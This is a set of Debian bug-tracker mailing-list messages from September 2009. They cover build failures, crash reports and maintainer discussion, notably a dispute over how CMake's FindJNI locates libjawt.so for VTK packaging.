Hello, On ketvirtadienis 17 Rugsėjis 2009 13:33:24 Mathieu Malaterre wrote: I would think that DD cannot replace whatever choice is being done upstream. I'm not going to replace anything, I'm going to talk with cmake upstream about this. Secondly, fixing #544674 bug will NOT fix #545335. Current FindJNI.cmake refers to $JAVA_HOME/ppc in the search path as it is supposed to (according to openjdk-6-jre-headless package). There is no convention AFAIK. So unless you inspect all of them you will *not* find libjawt.so. Well, I've found how openjdk determines its libarch dir and mostly have proper cmake code for it. The actual proper fix in debian would be to have all libjawt.so provider to install the symlinks properly. Don't you find it weird that vtk builds just *fine* with FindJNI.cmake on arches it supposedly does NOT support (according to this bug) but fails on powerpc which it supports properly? This bug obviously attracted too much false attention. No it does not build, see your own remark below. FWIW, from vtk debian/rules: echo JAVA_AWT_LIBRARY:FILEPATH=/usr/lib/jvm/default- java/jre/lib/$(DEB_HOST_ARCH_CPU)/libjawt.so Build/CMakeCache.txt That's just wrong. cmake is doing system inspection. This was written by someone not knowing the cmake enough. That's a workaround for broken FindJNI, it could be improved a bit to exclude i386,amd64,powerpc where FindJNI does its job well. So that's where the powerpc FTBFS is coming from. It *overrides* proper value FindJNI sets on powerpc. It is also true that you cannot drop this workaround until #544674 is fixed. You will have to improve it. You missed earlier discussion, I do not know why Maitland push the issue over to you without the full discussion thread. If you look back in the history reverting the change will also break in other way. So in summary: you have to do system inspection because no DEB_*_ARCH / DEB_*_CPU will work on all combination of java package provider for libjawt.so I know I have to do it. And I will. Just don't push this as critical bug which holds testing migration. It does not. All you have to do is to patch up vtk packaging a bit. It is broken anyway. I can understand that you would prefer another solution (I also personnaly do), but for the time being there is no convention for debian package providing libjawt.so and symlinks are not always provided. So you just added Debian arches. What about linux arches debian does not support? I'm trying to think about broader issue here. I'd really see VTK / ITK / Slicer / GDCM being considered for testing for such a small issue that is so deeply burried in cmake internals. cmake will soon be released so this patch will be integrated anyway. The point is vtk NEEDS sourceful upload even if I fix FindJNI. Please don't put it like cmake is blocking something here. Just exclude i386,amd64,powerpc in vtk debian/rules for the time being to get quick resolution. -- Modestas Vainius modes...@vainius.eu signature.asc Description: This is a digitally signed message part.
Bug#536944: marked as done (uim: FTBFS: toolbar-applet-gnome.c:41:19: error: gnome.h: No such file or directory)
Your message dated Thu, 17 Sep 2009 11:47:38 + with message-id e1mofsc-0002sf...@ries.debian.org and subject line Bug#536944: fixed in uim 1:1.5.6-1 has caused the Debian Bug report #536944, regarding uim: FTBFS: toolbar-applet-gnome.c:41:19: error: gnome.h: No such file or directory to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 536944: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=536944 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: uim Version: 1:1.5.5-1 Severity: serious User: debian...@lists.debian.org Usertags: qa-ftbfs-20090713 qa-ftbfs Justification: FTBFS on amd64 Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part: cc -DHAVE_CONFIG_H -I. -I../uim -I../replace -I../uim -DUIM_DATADIR=\/usr/share/uim\ -I.. -I.. -D_REENTRANT -I/usr/include/gtk-2.0 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/pixman-1 -I/usr/include/freetype2 -I/usr/include/directfb -I/usr/include/libpng12 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -DORBIT2=1 -pthread -D_REENTRANT -I/usr/include/panel-2.0 -I/usr/include/gconf/2 -I/usr/include/gtk-2.0 -I/usr/include/libbonoboui-2.0 -I/usr/include/orbit-2.0 -I/usr/include/dbus-1.0 -I/usr/lib/dbus-1.0/include -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/pixman-1 -I/usr/include/freetype2 -I/usr/include/directfb -I/usr/include/libpng12 -I/usr/include/libxml2 -I/usr/include/libbonobo-2.0 -I/usr/include/libgnomecanvas-2.0 -I/usr/include/libgnome-2.0 -I/usr/include/bonobo-activation-2.0 -I/usr/include/gail-1.0 -I/usr/include/libart-2.0 -I/usr/include/gnome-vfs-2.0 -I/usr/lib/gnome-vfs-2.0/include -g -O2 -g -Wall -O2 -pedantic -pipe -Wchar-subscripts -Wmissing-declarations -Wredundant-decls -Wmissing-prototypes -Wnested-externs -Wpointer-arith -Wcast-align -Wsign-compare -Wno-long-long -Wno-overlength-strings -DNDEBUG -Wno-error -c -o uim_toolbar_applet-toolbar-applet-gnome.o `test -f 'toolbar-applet-gnome.c' || echo './'`toolbar-applet-gnome.c toolbar-applet-gnome.c:41:19: error: gnome.h: No such file or directory toolbar-applet-gnome.c: In function 'display_about_dialog': toolbar-applet-gnome.c:164: warning: implicit declaration of function 'gnome_about_new' toolbar-applet-gnome.c:164: warning: nested extern declaration of 'gnome_about_new' toolbar-applet-gnome.c:171: warning: assignment makes pointer from integer without a cast make[2]: *** [uim_toolbar_applet-toolbar-applet-gnome.o] Error 1 The full build log is available from: http://people.debian.org/~lucas/logs/2009/07/13/uim_1:1.5.5-1_lsid64.buildlog A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot. Internet was not accessible from the build systems. -- | Lucas Nussbaum | lu...@lucas-nussbaum.net http://www.lucas-nussbaum.net/ | | jabber: lu...@nussbaum.fr GPG: 1024D/023B3F4F | ---End Message--- ---BeginMessage--- Source: uim Source-Version: 1:1.5.6-1 We believe that the bug you reported is fixed in the latest version of uim, which is due to be installed in the Debian FTP archive: libuim-data_1.5.6-1_amd64.deb to pool/main/u/uim/libuim-data_1.5.6-1_amd64.deb libuim-dev_1.5.6-1_amd64.deb to pool/main/u/uim/libuim-dev_1.5.6-1_amd64.deb libuim6-dbg_1.5.6-1_amd64.deb to pool/main/u/uim/libuim6-dbg_1.5.6-1_amd64.deb libuim6_1.5.6-1_amd64.deb to pool/main/u/uim/libuim6_1.5.6-1_amd64.deb uim-anthy_1.5.6-1_amd64.deb to pool/main/u/uim/uim-anthy_1.5.6-1_amd64.deb uim-applet-gnome_1.5.6-1_amd64.deb to pool/main/u/uim/uim-applet-gnome_1.5.6-1_amd64.deb uim-applet-kde_1.5.6-1_amd64.deb to pool/main/u/uim/uim-applet-kde_1.5.6-1_amd64.deb uim-byeoru_1.5.6-1_all.deb to pool/main/u/uim/uim-byeoru_1.5.6-1_all.deb uim-canna_1.5.6-1_amd64.deb to pool/main/u/uim/uim-canna_1.5.6-1_amd64.deb uim-common_1.5.6-1_all.deb to pool/main/u/uim/uim-common_1.5.6-1_all.deb uim-el_1.5.6-1_amd64.deb to pool/main/u/uim/uim-el_1.5.6-1_amd64.deb uim-fep_1.5.6-1_amd64.deb to pool/main/u/uim/uim-fep_1.5.6-1_amd64.deb uim-gtk2.0_1.5.6-1_amd64.deb to pool/main/u/uim/uim-gtk2.0_1.5.6-1_amd64.deb uim-hangul_1.5.6-1_all.deb to pool/main/u/uim/uim-hangul_1.5.6-1_all.deb
Bug#547174: fails to start due to XML parser stupidity
Package: inkscape Version: 0.46-9 Severity: grave I am almost certain this isn't an inkscape bug, but I cannot allocate time to track this down right now. Please reassign. Fact is that the parser is very confused about line #1 and what start of the document means. lapse:~|master|% inkscape #10001 /usr/share/inkscape/templates/default.svg:1: parser error : XML declaration allowed only at the start of the document ?xml version=1.0 encoding=UTF-8 standalone=no? [there are more errors like this following, which I've cut.] Inkscape does not start. -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.30-1-686 (SMP w/1 CPU core) Locale: LANG=en_GB, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages inkscape depends on: ii libatk1.0-01.26.0-1 The ATK accessibility toolkit ii libc6 2.9-26GNU C Library: Shared libraries ii libcairo2 1.8.8-2 The Cairo 2D vector graphics libra ii libcairomm-1.0-1 1.8.0-1 C++ wrappers for Cairo (shared lib ii libfontconfig1 2.6.0-4 generic font configuration library ii libfreetype6 2.3.9-5 FreeType 2 font engine, shared lib ii libgc1c2 1:6.8-1.2 conservative garbage collector for ii libgcc11:4.4.1-4 GCC support library ii libgconf2-42.26.2-3 GNOME configuration database syste ii libglib2.0-0 2.20.5-1 The GLib library of C routines ii libglibmm-2.4-1c2a 2.20.1-1 C++ wrapper for the GLib toolkit ( ii libgnomevfs2-0 1:2.24.1-4GNOME Virtual File System (runtime ii libgtk2.0-02.16.6-1 The GTK+ graphical user interface ii libgtkmm-2.4-1c2a 1:2.16.0-2C++ wrappers for GTK+ 2.4 (shared ii libgtkspell0 2.0.13-2 a spell-checking addon for GTK's T ii liblcms1 1.18.dfsg-1 Color management library ii libpango1.0-0 1.24.5-1 Layout and rendering of internatio ii libpangomm-1.4-1 2.24.0-3+b1 C++ Wrapper for pango (shared libr ii libpng12-0 1.2.39-1 PNG library - runtime ii libpoppler-glib4 0.10.6-1 PDF rendering library (GLib-based ii libpoppler40.10.6-1 PDF rendering library ii libpopt0 1.14-4lib for parsing cmdline parameters ii libsigc++-2.0-0c2a 2.0.18-2 type-safe Signal Framework for C++ ii libssl0.9.80.9.8k-5 SSL shared libraries ii libstdc++6 4.4.1-4 The GNU Standard C++ Library v3 ii libwpd8c2a 0.8.14-1 Library for handling WordPerfect d ii libwpg-0.1-1 0.1.3-1 WordPerfect graphics import/conver ii libx11-6 2:1.2.2-1 X11 client-side library ii libxft22.1.13-3 FreeType-based font drawing librar ii libxml22.7.4.dfsg-1 GNOME XML library ii libxslt1.1 1.1.24-2 XSLT processing library - runtime ii zlib1g 1:1.2.3.3.dfsg-15 compression library - runtime Versions of packages inkscape recommends: ii imagemagick 7:6.5.5.3-1 image manipulation programs ii libwmf-bin 0.2.8.4-6.1 Windows metafile conversion tools ii perlmagick 7:6.5.5.3-1 Perl interface to the ImageMagick ii pstoedit 3.45-8 PostScript and PDF files to editab Versions of packages inkscape suggests: ii dia 0.97-2 Diagram editor ii libgnomevfs2-extra1:2.24.1-4 GNOME Virtual File System (extra m pn libsvg-perl none (no description available) pn libxml-xql-perl none (no description available) ii python2.5.4-2An interactive high-level object-o pn python-lxml none (no description available) ii python-numpy 1:1.3.0-3 Numerical Python adds a fast array pn python-uniconvertor none (no description available) ii ruby 4.2An interpreter of object-oriented pn skencil none (no description available) ii ttf-bitstream-vera1.10-7 The Bitstream Vera family of free -- no debconf information -- .''`. martin f. krafft madd...@d.o Related projects: : :' : proud Debian developer http://debiansystem.info `. `'` http://people.debian.org/~madduckhttp://vcs-pkg.org `- Debian - when you have better things to do than fixing systems digital_signature_gpg.asc Description: Digital signature (see
Bug#545335: Bug#544674:
On Thu, Sep 17, 2009 at 1:26 PM, Modestas Vainius modes...@vainius.eu wrote: Secondly, fixing #544674 bug will NOT fix #545335. Current FindJNI.cmake refers to $JAVA_HOME/ppc in the search path as it is supposed to (according to openjdk-6-jre-headless package). There is no convention AFAIK. So unless you inspect all of them you will *not* find libjawt.so. Well, I've found how openjdk determines its libarch dir and mostly have proper cmake code for it. Excellent. How about all the other ones ? http://packages.debian.org/search?suite=sidsearchon=contentskeywords=libjawt.so That's just wrong. cmake is doing system inspection. This was written by someone not knowing the cmake enough. That's a workaround for broken FindJNI, it could be improved a bit to exclude i386,amd64,powerpc where FindJNI does its job well. Well FindJNI is an interface, it should work regardless of CPU/ARCH. You missed earlier discussion, I do not know why Maitland push the issue over to you without the full discussion thread. If you look back in the history reverting the change will also break in other way. So in summary: you have to do system inspection because no DEB_*_ARCH / DEB_*_CPU will work on all combination of java package provider for libjawt.so I know I have to do it. And I will. Just don't push this as critical bug which holds testing migration. It does not. All you have to do is to patch up vtk packaging a bit. It is broken anyway. True. I can understand that you would prefer another solution (I also personnaly do), but for the time being there is no convention for debian package providing libjawt.so and symlinks are not always provided. So you just added Debian arches. What about linux arches debian does not support? I'm trying to think about broader issue here. Correct it will fails miserably. I just do not know how to deal with that in a portable manner. I haven't found any documentation that describe where libjawt.so should be located. I'd really see VTK / ITK / Slicer / GDCM being considered for testing for such a small issue that is so deeply burried in cmake internals. cmake will soon be released so this patch will be integrated anyway. The point is vtk NEEDS sourceful upload even if I fix FindJNI. Please don't put it like cmake is blocking something here. Just exclude i386,amd64,powerpc in vtk debian/rules for the time being to get quick resolution. Well the patch you describe in your other mail: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=544674#68 has just been applied upstream (thanks to Denis Barbier), it took *several* round to get it right (Denis, Berk, Jeff, Brad and I did work on that patch). I doubt anyone will actually spent the time to integrate this large patch to VTK 5.2 since it is so old. VTK 5.4 is out and VTK 5.6 should come out soon. So I thought -again for the time being- that this modest patch was ok. -- Mathieu -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547175: installation-report: SunBlade 2000: fails to pick up ql2200_fw.bin from usb stick
Package: installation-reports Version: 2.38 Severity: grave Justification: renders package unusable The install requires ql2200_fw.bin to access the FC-AL disks. The installer tells you to put it onto a USB stick, but then doesn't detect it. The partition manager then just shows the USB stick as the destination drive! I got round this as follows: Come out of the partition manager. Alt-f2 to drop to a shell, and mount the USB stick: mount /dev/sda1 /mnt and then copy the firmware to /lib/firmware. Then, drop the module: modprobe -r qla2xxx and then reload it modprobe -v qla2xxx. The FC-AL disks are now visible. Return to the installer (alt-f1) and re-scan the disks. Voila! The install now completes properly. -- Package-specific info: Boot method: CD Image version: mini.iso This is a Debian installation CD-ROM, built on 20090123lenny4. Date: 17th Sept. 2009, 11am BST Machine: Sun SunBlade 2000 Partitions: df -Tl will do; the raw partition table is preferred FilesystemType 1K-blocks Used Available Use% Mounted on /dev/sdb2 ext333364448 3514464 28155128 12% / tmpfstmpfs 1034976 0 1034976 0% /lib/init/rw udev tmpfs 10240 1352 14% /dev tmpfstmpfs 1034976 0 1034976 0% /dev/shm /dev/sdb1 ext2 90329 15865 69645 19% /boot /dev/sda1 vfat 998944 16688982256 2% /media/ROSIE-HC /dev/sr0 iso96606060 6060 0 100% /media/cdrom0 Base System Installation Checklist: [O] = OK, [E] = Error (please elaborate below), [ ] = didn't try it Initial boot: [ ] Detect network card:[ ] Configure network: [ ] Detect CD: [ ] Load installer modules: [E] Detect hard drives: [ ] Partition hard drives: [ ] Install base system:[ ] Clock/timezone setup: [ ] User/password setup:[ ] Install tasks: [ ] Install boot loader:[ ] Overall install:[ ] Comments/Problems: See above. -- Please make sure that the hardware-summary log file, and any other installation logs that you think would be useful are attached to this report. Please compress large files using gzip. Once you have filled out this report, mail it to sub...@bugs.debian.org. == Installer lsb-release: == DISTRIB_ID=Debian DISTRIB_DESCRIPTION=Debian GNU/Linux installer DISTRIB_RELEASE=5.0 (lenny) - installer build 20090123lenny4 X_INSTALLATION_MEDIUM=miniiso == Installer hardware-summary: == umame -a: Linux sunblade2000 2.6.26-2-sparc64 #1 Thu Aug 20 15:21:01 UTC 2009 sparc64 unknown lspci -knn: :00:02.0 Ethernet controller [0200]: Realtek Semiconductor Co., Ltd. RTL-8169 Gigabit Ethernet [10ec:8169] (rev 10) lspci -knn: :00:05.0 Bridge [0680]: Sun Microsystems Computer Corp. RIO EBUS [108e:1100] (rev 01) lspci -knn: :00:05.1 Ethernet controller [0200]: Sun Microsystems Computer Corp. RIO 10/100 Ethernet [eri] [108e:1101] (rev 01) lspci -knn: Kernel driver in use: gem lspci -knn: Kernel modules: sungem lspci -knn: :00:05.2 FireWire (IEEE 1394) [0c00]: Sun Microsystems Computer Corp. RIO 1394 [108e:1102] (rev 01) lspci -knn: :00:05.3 USB Controller [0c03]: Sun Microsystems Computer Corp. RIO USB [108e:1103] (rev 01) lspci -knn: Kernel driver in use: ohci_hcd lspci -knn: Kernel modules: ohci-hcd lspci -knn: :00:06.0 SCSI storage controller [0100]: LSI Logic / Symbios Logic 53c875 [1000:000f] (rev 37) lspci -knn: Kernel driver in use: sym53c8xx lspci -knn: Kernel modules: sym53c8xx lspci -knn: :00:06.1 SCSI storage controller [0100]: LSI Logic / Symbios Logic 53c875 [1000:000f] (rev 37) lspci -knn: Kernel driver in use: sym53c8xx lspci -knn: Kernel modules: sym53c8xx lspci -knn: 0001:00:04.0 SCSI storage controller [0100]: QLogic Corp. QLA2200 64-bit Fibre Channel Adapter [1077:2200] (rev 05) lspci -knn: Kernel driver in use: qla2xxx lspci -knn: Kernel modules: qla2xxx prtconf: System Configuration: Sun Microsystems sun4u prtconf: Memory size: 2048 Megabytes prtconf: System Peripherals (Software Nodes): prtconf: prtconf: SUNW,Sun-Blade-1000 prtconf: packages (driver probably installed) prtconf: SUNW,builtin-drivers (driver probably installed) prtconf: deblocker (driver probably installed) prtconf: disk-label (driver probably installed) prtconf: terminal-emulator (driver probably installed) prtconf: dropins (driver probably installed) prtconf: kbd-translator (driver probably installed) prtconf: obp-tftp (driver probably installed) prtconf: SUNW,i2c-ram-device (driver probably installed) prtconf: SUNW,fru-device (driver probably installed) prtconf: chosen (driver probably installed) prtconf:
Bug#547165: marked as done (gcj-jre contains nothing (contrary to its description))
Your message dated Thu, 17 Sep 2009 15:02:55 +0200 with message-id 4ab2337f.9060...@debian.org and subject line Re: Bug#547165: gcj-jre contains nothing (contrary to its description) has caused the Debian Bug report #547165, regarding gcj-jre contains nothing (contrary to its description) to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 547165: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=547165 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: gcj-jre Version: 4:4.3.3-9 Severity: grave Justification: renders package unusable The description says: Description: Java runtime environment using GIJ/classpath GIJ is a Java bytecode interpreter, not limited to interpreting bytecode. It includes a class loader which can dynamically load shared objects, so it is possible to give it the name of a class which has been compiled and put into a shared library on the class path. . The package contains as well a collection of wrapper scripts and symlinks. It is meant to provide a Java-RTE-like interface to the GIJ/GCJ tool set. but the package contains nothing: $ dpkg -L gcj-jre /. /usr /usr/share /usr/share/doc /usr/share/doc/gcj-jre -- System Information: Debian Release: squeeze/sid APT prefers oldstable APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'stable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26.5-20080922 (SMP w/2 CPU cores; PREEMPT) Locale: LANG=POSIX, LC_CTYPE=en_US.ISO8859-1 (charmap=ISO-8859-1) Shell: /bin/sh linked to /bin/bash Versions of packages gcj-jre depends on: ii gcj-jre [java-gcj-compat] 4:4.3.3-9 Java runtime environment using GIJ ii gcj-jre-headless 4:4.3.3-9 Java runtime environment using GIJ ii java-gcj-compat 1.0.80-5.1 Java runtime environment using GIJ ii libgcj-common 1:4.4.0-7 Java runtime library (common files gcj-jre recommends no packages. gcj-jre suggests no packages. -- no debconf information ---End Message--- ---BeginMessage--- closing, wrong. see the hppa packages. On 17.09.2009 13:19, Vincent Lefevre wrote: Package: gcj-jre Version: 4:4.3.3-9 Severity: grave Justification: renders package unusable The description says: Description: Java runtime environment using GIJ/classpath GIJ is a Java bytecode interpreter, not limited to interpreting bytecode. It includes a class loader which can dynamically load shared objects, so it is possible to give it the name of a class which has been compiled and put into a shared library on the class path. . The package contains as well a collection of wrapper scripts and symlinks. It is meant to provide a Java-RTE-like interface to the GIJ/GCJ tool set. but the package contains nothing: $ dpkg -L gcj-jre /. /usr /usr/share /usr/share/doc /usr/share/doc/gcj-jre -- System Information: Debian Release: squeeze/sid APT prefers oldstable APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'stable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26.5-20080922 (SMP w/2 CPU cores; PREEMPT) Locale: LANG=POSIX, LC_CTYPE=en_US.ISO8859-1 (charmap=ISO-8859-1) Shell: /bin/sh linked to /bin/bash Versions of packages gcj-jre depends on: ii gcj-jre [java-gcj-compat] 4:4.3.3-9 Java runtime environment using GIJ ii gcj-jre-headless 4:4.3.3-9 Java runtime environment using GIJ ii java-gcj-compat 1.0.80-5.1 Java runtime environment using GIJ ii libgcj-common 1:4.4.0-7 Java runtime library (common files gcj-jre recommends no packages. gcj-jre suggests no packages. -- no debconf information ---End Message---
Bug#545335: Bug#544674:
Hello, On ketvirtadienis 17 Rugsėjis 2009 15:35:04 Mathieu Malaterre wrote: On Thu, Sep 17, 2009 at 1:26 PM, Modestas Vainius modes...@vainius.eu wrote: Secondly, fixing #544674 bug will NOT fix #545335. Current FindJNI.cmake refers to $JAVA_HOME/ppc in the search path as it is supposed to (according to openjdk-6-jre-headless package). There is no convention AFAIK. So unless you inspect all of them you will *not* find libjawt.so. Well, I've found how openjdk determines its libarch dir and mostly have proper cmake code for it. Excellent. How about all the other ones ? http://packages.debian.org/search?suite=sidsearchon=contentskeywords=libj awt.so openjdk libarch dir is the most complex one. Due to its proprietary nature, openjdk does some hardly explainable hacks with `uname -m`. Other JVMs are plain `uname -m` (kaffe) or no libarch subdir at all (gcj). Plain simple I would say. That's just wrong. cmake is doing system inspection. This was written by someone not knowing the cmake enough. That's a workaround for broken FindJNI, it could be improved a bit to exclude i386,amd64,powerpc where FindJNI does its job well. Well FindJNI is an interface, it should work regardless of CPU/ARCH. That's exactly the point. It SHOULD. That's the reason I don't like library path hardcoding like your patch does. I can understand that you would prefer another solution (I also personnaly do), but for the time being there is no convention for debian package providing libjawt.so and symlinks are not always provided. So you just added Debian arches. What about linux arches debian does not support? I'm trying to think about broader issue here. Correct it will fails miserably. I just do not know how to deal with that in a portable manner. I haven't found any documentation that describe where libjawt.so should be located. Because there are no docs about this. stuff is hidden deeply in java build system and *linux* specific hacks to discover that path at runtime. Java paths are a huge MESS. Well the patch you describe in your other mail: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=544674#68 has just been applied upstream (thanks to Denis Barbier), it took *several* round to get it right (Denis, Berk, Jeff, Brad and I did work on that patch). Yeah, it is hard to get that right. I doubt anyone will actually spent the time to integrate this large patch to VTK 5.2 since it is so old. VTK 5.4 is out and VTK 5.6 should come out soon. Since it is fixed in 5.4, leave upstream stuff in 5.2 as it is (it would be pointless to waste time on fixing obsolete stuff). Just fix up VTK 5.2 packaging hack now (a single ifeq line in debian/rules) and good path to libjawt.so will propagate to all vtk rdeps as a result. This will solve FTBFSes and let everything migrate to testing. In the meantime, proper fix for FindJNI won't take ages and you will be able to get rid of the hack all together really soon. So I thought -again for the time being- that this modest patch was ok. Maybe for Debian, but definitely not upstream... -- Modestas Vainius modes...@vainius.eu signature.asc Description: This is a digitally signed message part.
Bug#546315: pavucontrol suddenly fails with Gtk::IconThemeError
Hi,
I would like to confirm this bug with pavucontrol not starting. It only
happens when a bluetooth headset is connected.
The end of the strace reads:
gettimeofday({1253195736, 225705}, NULL) = 0
stat64(/root/.icons/hicolor/index.theme, 0xbfba396c) = -1 ENOENT (No
such file or directory)
stat64(/root/.local/share/icons/hicolor/index.theme, 0xbfba396c) = -1
ENOENT (No such file or directory)
stat64(/usr/local/share/icons/hicolor/index.theme, 0xbfba396c) = -1
ENOENT (No such file or directory)
stat64(/usr/share/icons/hicolor/index.theme, {st_mode=S_IFREG|0644,
st_size=22251, ...}) = 0
write(2, terminate called after throwing ..., 48) = 48
write(2, Gtk::IconThemeError, 19) = 19
write(2, '\n, 2) = 2
rt_sigprocmask(SIG_UNBLOCK, [ABRT], NULL, 8) = 0
tgkill(17333, 17333, SIGABRT) = 0
I'm not really sure what the problem is with the icon, since it looks
like it can reach /usr/share/icons/hicolor/index.theme.
- Maxime
--
Maxime Petazzoni http://www.bulix.org
``One by one, the penguins took away my sanity.''
Linux kernel and software developer at MontaVista Software
signature.asc
Description: Digital signature
Bug#542169: clvm: Incorrect provides, runlevels and dependencies in init.d script
I discovered yesterday that piuparts already detected the installation error. The log from that test is available from URL: http://piuparts.debian.org/sid/fail/clvm_2.02.51-4.log . clvm depend on cman to work, and the bug in the redhat-cluster package is reported as #541980. I've uploaded an NMU to fix it yesterday, to the 2 day delayed queue. The fix should enter the archive soon. Happy hacking, -- Petter Reinholdtsen -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#545608: Bug #545608: intent to NMU polybori
On Thu, 17 Sep 2009, Luca Falavigna wrote: Hi Tim, your package is FTBFSing due to changes in boost1.39, as described here: http://svn.debian.org/viewsvn/pkg-boost/boost/trunk/debian/NEWS.Debian?r1=14443r2=14478 Fix consists in removing 01-fix-ftbfs-with-new-boost.diff. I plan to prepare a NMU in the next few days and upload to the DELAYED queue as per devref §5.11.1, please inform me if you want me to wait. Hi Luca, I have no problem with your NMUing that change (I agree that all that is needed is to remove the patch from last time). That said, I was probably going to get around to doing such an upload on Saturday, so if you have a lot of these to take care of, I'd be happy to deal with this one. Best regards, -Tim Abbott
Bug#546928: Version 1.0.12 of Mandos is released
Version 1.0.12 of Mandos is released. This is a bug fix release. Thanks to Petter Reinholdtsen p...@hungry.com for submitting a patch fixing the dependency based boot sequencing! Version 1.0.12 (2009-09-17) * Client ** Bug fix: Allow network interface renaming by udev, by taking down the network interface after using it. ** Bug fix: User-supplied plugins are now installed correctly. ** Bug fix: If usplash was used but the password was instead provided by the Mandos server, the usplash daemon used to ignore the first command passed to it. This has been fixed. ** Bug fix: Make the --userid and --groupid options in plugin-runner.conf work. * Server ** Bug fix: Fix the LSB header in the init.d script to make dependency based booting work. ** A client receiving its password now also counts as if a checker was run successfully (i.e. the timeout timer is reset). The upload would fix these Debian bugs: 546928 The Debian package for unstable can be found on mentors.debian.net: - dget http://mentors.debian.net/debian/pool/main/m/mandos/mandos_1.0.12-1.dsc For your information, I've changed my personal primary PGP key; it used to be 95EA23DD, now it's E0C20CFF. I've not revoked my old key, since there's nothing wrong with it, but I will be using my new key wherever possible from now on: pub 2048R/E0C20CFF 2009-05-09 Key fingerprint = 6391 763B 3994 3426 98E5 820E F7EE 616E E0C2 0CFF uid Teddy Hogeborn te...@fukt.bsnet.se sub 2048R/9F1D4E27 2009-05-09 (Note: The Mandos Maintainer Team key has *not* changed; it's still 66CD1C47.) /Teddy Hogeborn -- The Mandos Project http://www.fukt.bsnet.se/mandos ___ Mandos-Dev mailing list mandos-...@fukt.bsnet.se http://mail.fukt.bsnet.se/cgi-bin/mailman/listinfo/mandos-dev -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547186: g15daemon: Random crashes
Package: g15daemon Version: 1.9.5.3-6 Severity: grave Justification: renders package unusable g15daemon crashes after a few minutes when used with the Z-10 speakers. Not tested with G15 keyboard. -- System Information: Debian Release: squeeze/sid APT prefers testing-proposed-updates APT policy: (500, 'testing-proposed-updates'), (500, 'proposed-updates'), (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.30-1-686 (SMP w/2 CPU cores) Locale: LANG=de_AT.UTF-8, LC_CTYPE=de_AT.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages g15daemon depends on: ii libc6 2.9-26GNU C Library: Shared libraries ii libfreetype6 2.3.9-5 FreeType 2 font engine, shared lib ii libg15-1 1.2.7-2 Library for interfacing with the L ii libg15daemon-client1 1.9.5.3-6 Development packages for libg15dae ii libg15render1 1.3.0~svn316-2Library for interfacing with the L ii libusb-0.1-4 2:0.1.12-13 userspace USB programming library ii zlib1g 1:1.2.3.3.dfsg-15 compression library - runtime Versions of packages g15daemon recommends: ii xkb-data 1.6-1 X Keyboard Extension (XKB) configu g15daemon suggests no packages. -- no debconf information g15daemon.strace.gz Description: GNU Zip compressed data
Bug#547188: krandrtray does not come back automagically when we merge output
Package: kdebase-workspace-bin Version: 4:4.3.1-1 Severity: grave Krandrtray offer to go to previous setting after 15s if we do not click on ok. Unfortunatly it apply immediatly the setting when merging the output leading on my video output on a black screen, crashing my Xsession (therefore grave) Regards Bastien --- System information. --- Architecture: amd64 Kernel: Linux 2.6.30-1-amd64 Debian Release: squeeze/sid 550 testing http.us.debian.org 500 unstablehttp.us.debian.org --- Package information. --- Depends (Version) | Installed ==-+-== kdebase-runtime (= 4:4.3.0) | 4:4.3.1-1 kdelibs5 (= 4:4.3.1) | 4:4.3.1-1 libc6 (= 2.2.5) | 2.9-25 libdbus-1-3 (= 1.0.2) | 1.2.16-2 libfontconfig1 (= 2.4.0) | 2.6.0-4 libfreetype6(= 2.2.1) | 2.3.9-5 libgl1-mesa-glx| 7.5.1-1 OR libgl1 | libglib2.0-0 (= 2.12.0) | 2.20.5-1 libice6 (= 1:1.0.0) | 2:1.0.5-1 libkephal4(= 4:4.3.1) | 4:4.3.1-1 libkfontinst4 (= 4:4.3.1) | 4:4.3.1-1 libknotificationitem-1-1 (= 4:4.3.1) | 4:4.3.1-1 libkscreensaver5 (= 4:4.3.1) | 4:4.3.1-1 libkworkspace4(= 4:4.3.1) | 4:4.3.1-1 libnepomukquery4 (= 4:4.3.1) | 4:4.3.1-1 libnepomukqueryclient4(= 